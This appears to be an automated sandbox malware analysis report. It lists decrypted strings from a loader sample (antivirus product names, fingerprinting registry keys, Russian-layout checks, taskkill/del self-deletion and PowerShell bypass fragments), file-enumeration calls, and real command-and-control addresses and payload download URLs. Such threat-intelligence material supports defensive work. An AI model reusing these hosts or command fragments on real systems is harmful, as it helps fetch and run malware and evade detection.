Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Kaspersky Lab
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Panda Security
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Doctor Web
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: 360TotalSecurity
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Bitdefender
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Norton
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Sophos
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Comodo
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: WinDefender
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: 0123456789
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: ------
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: ?scr=1
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: ComputerName
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: -unicode-
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: VideoID
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: DefaultSettings.XResolution
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: DefaultSettings.YResolution
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: ProductName
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: CurrentBuild
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: rundll32.exe
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: "taskkill /f /im "
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: " && timeout 1 && del
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: && Exit"
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: " && ren
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Powershell.exe
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: shutdown -s -t 0
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: random
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Keyboard Layout\Preload
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: 00000419
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: 00000422
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: 00000423
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: 0000043f

Source: random.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb source: PfOHmro.exe, 00000010.00000000.1471258251.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, PfOHmro.exe, 00000010.00000002.1588918971.0000000004199000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\2023CryptsDone\WinFormProject-master\obj\Debug\Aml.pdb source: rapes.exe, 0000000B.00000003.2180876738.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, mIrI3a9.exe, 00000034.00000000.1645079529.0000000000912000.00000002.00000001.01000000.00000017.sdmp
Source:	Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb<;V; H;_CorExeMainmscoree.dll source: PfOHmro.exe, 00000010.00000000.1471258251.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, PfOHmro.exe, 00000010.00000002.1588918971.0000000004199000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Code function: 25_2_00406301 FindFirstFileW,FindClose,	25_2_00406301
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Code function: 25_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	25_2_00406CC7
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_0102A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	51_2_0102A1E2
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_0102A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	51_2_0102A087
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_0102A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	51_2_0102A570
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_0101E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	51_2_0101E472
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_00FEC622 FindFirstFileExW,	51_2_00FEC622
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_010266DC FindFirstFileW,FindNextFileW,FindClose,	51_2_010266DC
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_01027333 FindFirstFileW,FindClose,	51_2_01027333
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_010273D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	51_2_010273D4
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_0101D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	51_2_0101D921
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_0101DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	51_2_0101DC54

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\Local\Temp\789919
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\Local\Temp\789919\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 176.113.115.6
Source: Malware configuration extractor	URLs: 101.99.92.190:40919

Source: Joe Sandbox View	IP Address: 176.113.115.7 176.113.115.7
Source: Joe Sandbox View	IP Address: 176.113.115.6 176.113.115.6

Source: Joe Sandbox View	ASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY
Source: Joe Sandbox View	ASN Name: SELECTELRU SELECTELRU

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

Code function: 11_2_00D905B0 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,

11_2_00D905B0

Source: PfOHmro.exe, 00000013.00000002.2351728389.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, PfOHmro.exe, 00000013.00000002.2351728389.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, PfOHmro.exe, 00000013.00000002.2351728389.0000000002DDA000.00000004.00000800.00020000.00000000.sdmp, PfOHmro.exe, 00000013.00000002.2351728389.0000000002F36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://101.99.92.190:40919
Source: PfOHmro.exe, 00000013.00000002.2351728389.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://101.99.92.190:40919/
Source: PfOHmro.exe, 00000013.00000002.2351728389.0000000002D38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://101.99.92.190:4449
Source: PfOHmro.exe, 00000013.00000002.2351728389.0000000002D38000.00000004.00000800.00020000.00000000.sdmp, PfOHmro.exe, 00000013.00000002.2351728389.0000000002C51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://101.99.92.190:4449/EdgeBHO.exe
Source: PfOHmro.exe, 00000013.00000002.2351728389.0000000002D38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://101.99.92.190:4449t-
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/3
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/46122658-3693405117-2476756634-1003
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/:
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C46000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3346505237.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.php
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.php4
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpF
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpH
Source: rapes.exe, 0000000B.00000003.2180876738.0000000000C29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpu8
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpv
Source: rapes.exe, 0000000B.00000003.2180876738.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpx
Source: rapes.exe, 0000000B.00000003.2180876738.0000000000C29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.php~8
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/113.115.7/files/qqdoup/random.exe
Source: rapes.exe, 0000000B.00000003.2180876738.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/527224533/ReK7Ewx.exe
Source: rapes.exe, 0000000B.00000003.2180876738.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/527224533/ReK7Ewx.exei
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/5419477542/ADFoyxP.exe
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/5419477542/ADFoyxP.exeA
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/5526411762/CgmaT61.exe
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/5526411762/yUI6F6C.exe
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/5526411762/yUI6F6C.exe1dac97d7aee
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/5526411762/yUI6F6C.exe1dac97d7aee7l
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/5526411762/yUI6F6C.exeDFoyxP.exe7w
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/5526411762/yUI6F6C.exew
Source: rapes.exe, 0000000B.00000003.2180876738.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/6142491850/FvbuInU.exe
Source: rapes.exe, 0000000B.00000003.2180876738.0000000000C29000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/6291786446/EDM8nAR.bat
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/6291786446/EDM8nAR.batshqos.dll
Source: rapes.exe, 0000000B.00000003.2180876738.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/6386900832/PfOHmro.exe
Source: rapes.exe, 0000000B.00000003.2180876738.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/6386900832/PfOHmro.exe-
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/6691015685/V0Bt74c.exe
Source: rapes.exe, 0000000B.00000003.2180876738.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/7098980627/mAtJWNv.exee
Source: rapes.exe, 0000000B.00000003.2180876738.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/7098980627/mAtJWNv.exes
Source: rapes.exe, 0000000B.00000003.2180876738.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/7212159662/HmngBpR.exe
Source: rapes.exe, 0000000B.00000003.2180876738.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/7821444099/mIrI3a9.exe
Source: rapes.exe, 0000000B.00000003.2180876738.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/7834629666/v6Oqdnc.exe
Source: rapes.exe, 0000000B.00000003.2180876738.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/7834629666/v6Oqdnc.exe;
Source: rapes.exe, 0000000B.00000003.2180876738.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/7868598855/zY9sqWs.e
Source: rapes.exe, 0000000B.00000003.2180876738.0000000000C81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/7868598855/zY9sqWs.exe
Source: rapes.exe, 0000000B.00000003.2180876738.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/7868598855/zY9sqWs.exe.exe
Source: rapes.exe, 0000000B.00000003.2180876738.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/7868598855/zY9sqWs.exe1dac97d7aee7fl
Source: rapes.exe, 0000000B.00000003.2180876738.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/7868598855/zY9sqWs.exea
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/martin2/random.exe
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/martin2/random.exed
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/martin2/random.exed3e
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/martin2/random.exem
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/qqdoup/random.exe
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/qqdoup/random.exeG
Source: rapes.exe, 0000000B.00000002.3346505237.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/teamex_support/random.exe
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/unique2/random.exe
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/unique2/random.exe9
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/luma/random.exed
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/luma/random.exep
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/off/random.exe
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/off/random.exe8
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/steam/random.exe
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/steam/random.exeS
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/test/am_no.bat
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/test/am_no.bat$
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/test/exe/random.exe
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/well/random.exe
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/well/random.exehp
Source: rapes.exe, 0000000B.00000002.3346505237.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000003.2180876738.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, ADFoyxP[1].exe.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: rapes.exe, 0000000B.00000003.2180876738.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0K
Source: rapes.exe, 0000000B.00000002.3346505237.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000003.2180876738.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, ADFoyxP[1].exe.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: rapes.exe, 0000000B.00000002.3346505237.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000003.2180876738.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, ADFoyxP[1].exe.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: rapes.exe, 0000000B.00000002.3346505237.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000003.2180876738.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, ADFoyxP[1].exe.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Occupation.com, 00000026.00000003.1600904437.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, Occupation.com, 00000026.00000003.2097214540.0000000003B0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Occupation.com, 00000026.00000003.1600904437.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, Occupation.com, 00000026.00000003.2097214540.0000000003B0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Occupation.com, 00000026.00000003.1600904437.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, Occupation.com, 00000026.00000003.2097214540.0000000003B0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Occupation.com, 00000026.00000003.1600904437.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, Occupation.com, 00000026.00000003.2097214540.0000000003B0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Occupation.com, 00000026.00000003.1600904437.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, Occupation.com, 00000026.00000003.2097214540.0000000003B0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: powershell.exe, 00000035.00000002.1708735043.0000000008349000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: ADFoyxP[1].exe.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: rapes.exe, 0000000B.00000003.2180876738.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: rapes.exe, 0000000B.00000002.3346505237.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000003.2180876738.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, ADFoyxP[1].exe.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: rapes.exe, 0000000B.00000002.3346505237.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000003.2180876738.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, ADFoyxP[1].exe.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ADFoyxP[1].exe.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: rapes.exe, 0000000B.00000002.3346505237.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000003.2180876738.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, ADFoyxP[1].exe.11.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: ReK7Ewx.exe, 00000019.00000002.2606612402.0000000000409000.00000002.00000001.01000000.0000000F.sdmp, ReK7Ewx.exe, 00000019.00000000.1540442402.0000000000409000.00000002.00000001.01000000.0000000F.sdmp, ADFoyxP[1].exe.11.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
